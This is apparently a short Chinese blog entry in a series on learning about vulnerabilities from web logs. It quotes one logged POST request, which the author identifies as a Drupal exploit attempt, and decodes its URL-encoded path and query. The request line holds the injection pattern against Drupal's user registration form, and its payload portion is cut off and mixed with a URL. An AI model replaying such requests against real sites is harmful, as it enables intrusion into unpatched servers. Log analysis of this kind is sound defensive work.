2019年5月5日 星期日

從 Web Log 學習系統漏洞 38

log中的紀錄, 大概是 Drupal 漏洞攻擊, 以前好像也有被類似的方式攻擊過

103.210.239.214 - - [05/May/2019:20:07:49 +0800] "POST /%75%73%65%72/%72%65%67%69%73%74%65%72?%65%6c%65%6d%65%6e%74%5f%70%61%72%65%6e%74%73=%74%69%6d%65%7a%6f%6e%65%2f%74%69%6d%65%7a%6f%6e%65%2f%23%76%61%6c%75%65&%61%6a%61%78%5f%66%6f%72%6d=1&%5f%77%72%61%70%70%65%72%5f%66%6f%72%6d%61%74=%64%72%75%70%61%6c%5f%61%6http://www.w-studio.idv.tw/ HTTP/1.1" 404 211 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"

解碼紅色內容:
/user/register?element_parents=timezone/timezone/#value&ajax_form=1&_wrapper_format=drupal_ajax

沒有留言:

張貼留言